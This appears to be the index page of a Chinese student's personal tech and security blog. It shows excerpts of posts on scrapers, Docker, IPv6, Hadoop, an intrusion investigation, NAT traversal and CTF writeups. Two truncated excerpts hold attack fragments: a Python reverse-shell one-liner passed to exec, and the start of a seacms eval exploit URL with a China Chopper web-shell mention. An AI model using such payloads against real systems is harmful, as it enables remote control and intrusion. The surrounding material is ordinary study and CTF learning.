Les1ie

一生想做浪漫极客

和教务处反爬虫之间的游戏

感谢教务处为我们技术进步做出的不懈努力

序 之前写了个爬学校各大网站新闻然后推送到邮箱的程序,上线了几个月,一直正常运行,还收获了一些用户 直到前几天突然发现.. 似乎很久没收到过邮件推送的教务处的更新了,莫非教务处改了网页,爬虫拿不到数据了? 手抖删库 ssh连到服务器里面,检查了下负责教务处的jwc.py, 发现运行返回值是None, 正常情况下是返回当前页面所有的新闻的标题和url, 每个新闻的具体内容,确认就是这里出...

2017 美亚柏科邀请赛 writeup

一个辣鸡随手写的writeup

序 拿flag是不可能的了,这辈子都不可能拿flag的。 题目又不会,只能看看各位神仙师傅的wp才能勉强说是我是搞安全的。 逛大佬的博客就像是回了家一样,这里的师傅都好有才,说话又好听,我超喜欢这里的。 web2 题目 login as webmaster 打开是一个登录框 看起来像是一个爆破或者登录绕过。 拿出了1w的字典,php万能密码爆破许久,试过了root, admin,ad...

SCURSS 开发小记

一个好玩的网站消息推送系统

序 2017年暑假的时候经常逛freebuf,每天都会刷好几次 因为懒得打开,于是用了ifttt, 连接了pocket, 手机上有pocket的客户端,设定规则是 if freebuf更新文章了,then 添加到我的pocket阅读列表里面。 最初还有点用,但是后来渐渐发现这样用有点问题,不是随时有时间看,但是他的更新会一直加,加上当时订阅了好几个网站的更新,所以很快pocket列表也...

Docker Compose容器编排

序 因为某些原因,写了个新闻聚合的应用,取名SCURSS ,这里想分享的是用容器进行虚拟化的思路 容器 具体内容就是一个爬虫定期爬取教务处,计算机学院官网,学工部,然后检查新闻内容是否发生了变化,如果发生了变化,那么更新数据库,然后邮件推送给订阅的用户发生更新了的消息 这里想说的是用的docker来部署的服务, 虽然这不是什么新鲜的东西,但是我还没处理过这么多的容器之间的依赖关系,所以简...

Ipv6随笔

一直没有仔细地研究过的ipv6

0x00 序 总是有人问川大的Ipv6是多少,看着这个问题怪别扭,就像问川大的教室是哪个一样,这种问题怎么回答? 不过或许可以直接回答是哪一个CIDR段(数据来源于 这里 ) 2001:250:2003::/48 也就是 2001:250:2003:0000:0000:0000:0000 到 2001:250:200:ffff:ffff:ffff:ffff 分配给四川大学的一共...

配置hadoop环境

生命在于折腾

0x00 序 前两天一同学来找我问爬虫,知道周五上午有个课程要说爬虫,瞬间兴趣来了,于是今天去上了课,发现挺有趣,现在让我们配置Hadoop,简要记录下过程 0x01 docker 国际惯例,找别人的docker镜像 $ docker search hadoop NAME DESCRIPTION ...

python built-in function

python 的內建函数

0x00 2017-8-8 14:17:43 一直没有怎么用过python的几个内建函数,这里学习一下 0x01 exec 这个嘛..执行代码片段,反弹shell不解释 In [1]: s = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("111.23...

某服务器被入侵,追踪入侵者

记录一次入侵分析的经历

0x01 一个linux运维的群里面,今天突然有人说服务器被黑了,找人帮忙分析,日志被清除了,只留下了几条执行过的命令,他给出了个几个截图,都是他执行过的命令 0x02 看了下他的截图, 攻击者最初是如何进入系统的已经无法知道了,说让他给我他公司服务器地址让我测试也没后文,所以对方如何进入服务器我也不得而知,他说服务器是tomcat的,觉得可能有apache的几个漏洞进去的,或者是账户被...

内网穿透笔记

编译ngrok以及使用frp进行穿透

0x00 序言 2017年6月9日00:03:07 这个是以前的笔记 校园网有一层waf, 从外网进来的所有请求都会被掐, 而我在学校里面有台服务器,回到家了就不能愉快的玩耍了,于是决定搞一个内网穿透。 (其实还有一个原因是我在二基楼搭了一台mc服务器,用宽带的同学没办法连过来一起玩, 逃) 用一台二基楼里一台低配置的电脑做跳板,穿到我的公网服务器上。 内网穿透方法很多, ssh ...

铁人三项数据赛笔记

铁人三项数据赛@CUIT

0x00 序言 2017年6月8日23:40:19 这是前段时间参加启明星辰比赛的笔记,当时写得匆忙,没有整理排版 0x01 正文 2017年4月22日23:53:38 最开始是202.1.1.2 是seacms, 网上找了下exp, 发现一个新出来的 菜刀直接连 http//202.1.1.2/search.php?searchtype=5&tid=&area=eval...